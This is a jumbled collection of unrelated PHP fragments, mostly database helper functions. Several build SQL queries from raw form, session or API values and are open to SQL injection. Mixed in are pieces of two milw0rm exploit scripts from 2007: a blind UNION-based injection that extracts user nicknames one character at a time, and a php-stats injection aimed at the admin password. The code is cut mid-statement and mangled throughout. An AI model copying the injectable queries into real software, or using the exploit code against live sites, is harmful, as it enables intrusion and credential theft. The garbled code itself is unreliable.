function insert_data()
{
$i = 0;
$size = sizeof($curl_result['report']['completed_test']);
$seed = 1 + $size / 2;
for ($i; $i < $size; $i++) {
$name = $curl_result['report']['completed_test'][$i]['candidate_name'];
$CId_HR = $curl_result['report']['completed_test'][$i]['candidate_id'];
//echo $i+1 ." " . $CId_HR ." ". $name. " " .$seed;
$query = "INSERT INTO coders (Id,CId_HR,Name,Seed) values ({$i}+1,{$CId_HR},'{$name}',{$seed})";
$response = mysqli_query($conn, $query);
check_query($response);
}
}
if (isset($_POST["Submit"])) {
//The post values have to be the same as the form <name> tag
$datetime = $_POST['Datetime'];
//validaton
$required_fields = array("Datetime");
validate_presences($required_fields);
if (!empty($errors)) {
$_SESSION["errors"] = $errors;
redirect_to('reserve.php');
}
//defining the query
$sql = "INSERT INTO Reserve ";
$sql .= "(DateAndTime, CustomerID) ";
$sql .= "VALUES ('{$datetime}', (SELECT CustomerID from Customer WHERE CustomerID='" . $_SESSION['user_id'] . "'))";
$result = mysqli_query($connection, $sql);
check_query($result);
//message when registration passes or fails
if ($result) {
$_SESSION["message"] = "Planning succesvol";
redirect_to('user.php');
} else {
$_SESSION["message"] = "Planning mislukt";
}
}
?>
<body>
<div id="wrapper">
<!-- HEADERIMG -->
<?php
// a-z
for ($j = 65; $j <= 90; $j++) {
$char = array_merge($char, array($j));
}
// A-Z
for ($j = 48; $j <= 57; $j++) {
$char = array_merge($char, array($j));
}
// 0-9
$index = 1;
$user = "";
print "\n[-] Username: "******"\n[-] Exploit failed...\n");
}
$sql = "%'/**/AND/**/id=-1/**/UNION/**/SELECT/**/nickname,1,1,1/**/FROM/**/{$pre}_users/**/" . "WHERE/**/id={$uid}/**/AND/**/ORD(SUBSTR(nickname,{$index},1))={$char[$i]}/*";
if (check_query($sql)) {
$user .= chr($char[$i]);
print chr($char[$i]);
break;
}
}
$index++;
}
print "\n\n[-] Successfull!\n";
?>
# milw0rm.com [2007-12-27]
function find_employee_by_email($email)
{
global $connection;
$safe_email = mysqli_real_escape_string($connection, $email);
$query = "SELECT * ";
$query .= "FROM Employees ";
$query .= "WHERE User = '******' ";
$query .= "LIMIT 1";
$user_set = mysqli_query($connection, $query);
check_query($user_set);
if ($user = mysqli_fetch_assoc($user_set)) {
return $user;
} else {
return null;
}
}
function update_66()
{
if ($GLOBALS["db_type"] == "pgsql") {
update_sql("CREATE TABLE {path} (\n pid serial,\n src varchar(128) NOT NULL default '',\n dst varchar(128) NOT NULL default '',\n PRIMARY KEY (pid)\n )");
update_sql("CREATE INDEX path_src_idx ON {path}(src)");
update_sql("CREATE INDEX path_dst_idx ON {path}(dst)");
$result = db_query("SELECT nid, path FROM {node} WHERE path != ''");
while ($node = db_fetch_object($result)) {
update_sql("INSERT INTO {path} (src, dst) VALUES ('node/view/{$node->nid}', '" . check_query($node->path) . "')");
}
} else {
update_sql("CREATE TABLE {path} (\n pid int(10) unsigned NOT NULL auto_increment,\n src varchar(128) NOT NULL default '',\n dst varchar(128) NOT NULL default '',\n PRIMARY KEY (pid),\n UNIQUE KEY src (src),\n UNIQUE KEY dst (dst)\n )");
// Migrate the existing paths:
$result = db_query("SELECT nid, path FROM {node} WHERE path != ''");
while ($node = db_fetch_object($result)) {
update_sql("INSERT INTO {path} (src, dst) VALUES ('node/view/{$node->nid}', '" . check_query($node->path) . "')");
}
update_sql("ALTER TABLE {node} DROP path");
}
}
function set_table()
{
global $host, $path, $prefix;
// insert a record into _pages table...
$pck = "GET {$path}php-stats.recphp.php HTTP/1.1\r\n";
$pck .= "Host: {$host}\r\n";
$pck .= "Keep-Alive: 300\r\n";
$pck .= "Connection: keep-alive\r\n\r\n";
http_send($host, $pck);
// ...and try to inject sql
$sql = "-1' UNION SELECT CONCAT(CHAR(39),' OR 1=1',CHAR(47),CHAR(42)) FROM {$prefix}_config WHERE name='admin_pass'/*";
$sql = str_replace("%27", "%2527", urlencode($sql));
$get = "visitor_id=acbd18db4cc2f85cedef654fccc4a4d8";
$get .= "&t=_default_value_";
$get .= "&ip={$sql}";
$pck = "GET {$path}php-stats.recjs.php?{$get} HTTP/1.1\r\n";
$pck .= "Host: {$host}\r\n";
$pck .= "Keep-Alive: 300\r\n";
$pck .= "Connection: keep-alive\r\n\r\n";
$html = http_send($host, $pck);
if (!check_query("/_default_value_/")) {
die("\n[-] Exploit failed...probably magic_quotes_runtime = on\n");
}
}
function find_sale_by_dates($start_date, $end_date)
{
global $con;
$start_date = date("Y-m-d", strtotime($start_date));
$end_date = date("Y-m-d", strtotime($end_date));
$sql = "SELECT s.date, p.name,p.sale_price,p.buy_price,";
$sql .= "COUNT(s.product_id) AS total_records,";
$sql .= "SUM(s.qty) AS total_sales,";
$sql .= "SUM(p.sale_price * s.qty) AS total_saleing_price,";
$sql .= "SUM(p.buy_price * s.qty) AS total_buying_price ";
$sql .= "FROM sales s ";
$sql .= "LEFT JOIN products p ON s.product_id = p.id";
$sql .= " WHERE s.date BETWEEN '{$start_date}' AND '{$end_date}'";
$sql .= " GROUP BY DATE(s.date),p.name";
$sql .= " ORDER BY DATE(s.date) DESC";
$result = mysqli_query($con, $sql);
if ($result) {
$results = while_loop($result);
} else {
check_query($result);
}
return $results;
}
$list = $match[1];
} else {
if (preg_match("/mailing list ([^@]+)/", $header["delivered-to"], $match)) {
$list = $match[1];
} else {
if (preg_match("/<([^@]+)/", $header["x-mailing-list"], $match)) {
$list = $match[1];
} else {
if (preg_match("/([^@]+)/", $header["x-loop"], $match)) {
$list = $match[1];
} else {
if (preg_match("/([^@\\.]+)/", $header["x-list-id"], $match)) {
$list = $match[1];
// Mailman
} else {
if (preg_match("/([^@\\.]+)/", $header["x-list"], $match)) {
$list = $match[1];
} else {
$list = "";
}
}
}
}
}
}
}
/*
** Insert the mail into the database:
*/
db_query("INSERT INTO mail (data, subject, header_from, header_to, header_cc, header_reply_to, body, list, timestamp) VALUES ('" . check_query($mail) . "', '" . check_query($header["subject"]) . "', '" . check_query($header["from"]) . "', '" . check_query($header["to"]) . "', '" . check_query($header["cc"]) . "', '" . check_query($header["reply-to"]) . "', '" . check_query($body) . "', '" . check_query($list) . "', '" . check_query(time()) . "')");
function select_users()
{
global $db;
$query = "SELECT * from users";
$result = mysqli_query($db, $query);
check_query($result);
return $result;
}
function find_page_byid($page_id)
{
global $connect;
$safe_page_id = mysqli_real_escape_string($connect, $page_id);
$query = "SELECT *";
$query .= " FROM pages";
$query .= " WHERE id = {$safe_page_id}";
$query .= " LIMIT 1";
$result = $connect->query($query);
check_query($result);
if ($page = $result->fetch_assoc()) {
return $page;
} else {
return null;
}
}
